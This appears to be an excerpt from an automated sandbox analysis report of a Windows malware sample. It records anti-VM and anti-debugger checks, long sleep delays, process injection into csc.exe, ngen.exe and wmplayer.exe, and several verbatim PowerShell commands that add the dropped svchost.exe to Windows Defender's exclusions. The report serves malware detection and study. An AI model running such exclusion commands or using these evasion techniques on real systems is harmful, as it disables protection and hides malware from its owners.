              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 20A4D5A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C217200000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1C22F200000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 39_2_00007FF887C10F40 sldt word ptr [eax]39_2_00007FF887C10F40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,13_2_004186FE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_004186FE
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,29_2_004186FE
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6277Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3446Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 1634
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 8359
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9249
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8027
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1324
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8584
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 802
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI coverage: 7.9 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeAPI coverage: 4.9 %
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeAPI coverage: 5.0 %
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe TID: 7680Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7732Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 5456Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5400Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7212Thread sleep count: 1634 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7212Thread sleep time: -4902000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7212Thread sleep count: 8359 > 30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 7212Thread sleep time: -25077000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2092Thread sleep count: 9249 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2800Thread sleep count: 156 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -7378697629483816s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7816Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7228Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5524Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\svchost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041A01B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040B28E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040838E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004087A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00407848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004068CD FindFirstFileW,FindNextFileW,19_2_004068CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0044BA59 FindFirstFileExA,19_2_0044BA59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00417AAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040AC78
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,29_2_0041A01B
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,29_2_0040B28E
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,29_2_0040838E
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,29_2_004087A0
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,29_2_00407848
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004068CD FindFirstFileW,FindNextFileW,29_2_004068CD
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0044BA59 FindFirstFileExA,29_2_0044BA59
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,29_2_0040AA71
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,29_2_00417AAB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,29_2_0040AC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406D28
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: Amcache.hve.16.drBinary or memory string: VMware
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.16.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.16.drBinary or memory string: VMware, Inc.
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: Amcache.hve.16.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.16.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.16.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: Amcache.hve.16.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: svchost.exe, 00000002.00000002.2966431021.00000250E6853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2965186842.00000250E122B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.3308848752.00000127C50D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Amcache.hve.16.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: Amcache.hve.16.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: Amcache.hve.16.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: Amcache.hve.16.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: csc.exe, 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000027.00000002.1636282586.000001C23267C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: om&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\1
              Source: Amcache.hve.16.drBinary or memory string: vmci.sys
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
              Source: Amcache.hve.16.drBinary or memory string: vmci.syshbin`
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Amcache.hve.16.drBinary or memory string: \driver\vmci,\driver\pci
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
              Source: Amcache.hve.16.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: Amcache.hve.16.drBinary or memory string: VMware20,1
              Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.16.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.16.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
              Source: Amcache.hve.16.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.16.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: svchost.exe, 00000009.00000002.1602264606.00000138B527F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
              Source: Amcache.hve.16.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.16.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
              Source: Amcache.hve.16.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.16.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.16.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: LisectAVT_2403002A_136.exe, 00000000.00000002.1366179663.000002143F4DC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: svchost.exe, 00000016.00000002.3308591628.00000127C502B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: Amcache.hve.16.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeAPI call chain: ExitProcess graph end nodegraph_13-47287
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess queried: DebugPort
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004327AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,13_2_0041A8DA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004407B5 mov eax, dword ptr fs:[00000030h]13_2_004407B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004407B5 mov eax, dword ptr fs:[00000030h]19_2_004407B5
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004407B5 mov eax, dword ptr fs:[00000030h]29_2_004407B5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,13_2_00410763
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004327AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004328FC SetUnhandledExceptionFilter,13_2_004328FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_004398AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00432D5C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_004327AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004328FC SetUnhandledExceptionFilter,19_2_004328FC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_004398AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00432D5C
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_004327AE
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004328FC SetUnhandledExceptionFilter,29_2_004328FC
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,29_2_004398AC
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,29_2_00432D5C
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Program Files (x86)\Windows Media Player\wmplayer.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 456000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 46E000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 474000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 475000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 476000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 47B000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F66008Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 400000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 401000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 456000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 46E000Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe base: 474000Jump to behavior
